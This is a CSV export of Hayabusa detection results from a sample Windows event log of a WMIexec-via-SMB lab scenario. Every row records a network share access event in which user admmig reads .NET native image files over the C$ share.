2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649#\996a8c9071e330fe0cfac06c4d9f2378  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176#\f8b6726fa5f43478af33a92559c0cef2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4#\f6be55d69bb92d49c71a4f9861c21451  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a#\1a3848fefabdd8a28f5cae97106da369  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d#\da3f8769af3163f94176c12ad223cb41  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001#\6a6b3af569c21f51ab2982968ae2775d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664#\559ec1b9bc74181e3591df47bdb6b7ce  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9#\4af7f054b14a220217737e71e6adff82  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb#\1a4e8e027cdf1271603e7eba2cd8fab0  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls\184c548bb9ea9e668823e3bedee4d86a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx\85a6f67f65de23064f7deded08a464c5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon\52b6052b9447848191f40e69c88f0f8b  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild\2965d6f0cc081ef81005efec548f72a9  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\c90ef9a73ea0044641d31b19023aad61  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt\2c945f157cd851b9dc43e99e9a89b34d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr\0ed1ed0e250773e63d7fe047dde76c81  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\napinit  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\napinit\1264f8bd57934a4941865b3c0512803e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\napsnap  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\napsnap\5ab2511c5224a660e85286b3f2c2b752  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57#\cc32e4d4e4dfbff56d3ae35134c1f38e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8#\6a2929eeb7b5fa6ff9ef1b0f4ff440f1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67#\efd939ad16f7521ac6c0c15afdcb2fa2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64#\8bb4776b03f3c369fd0c81c51cf468ac  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\92388fbe99436e6ed1f56ee56f10c565  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe#\9bb6d55c49486153c1c1872929def220  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c#\373b26e93f287f3cda45a6282a1de0d3  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b#\9551a2df153a961cbbcb79bca937a833  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877#\db7fe97a2a840dcc0278f7af89ea7fbe  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c#\be1a119716bb1de8469b568ec9e31d9c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
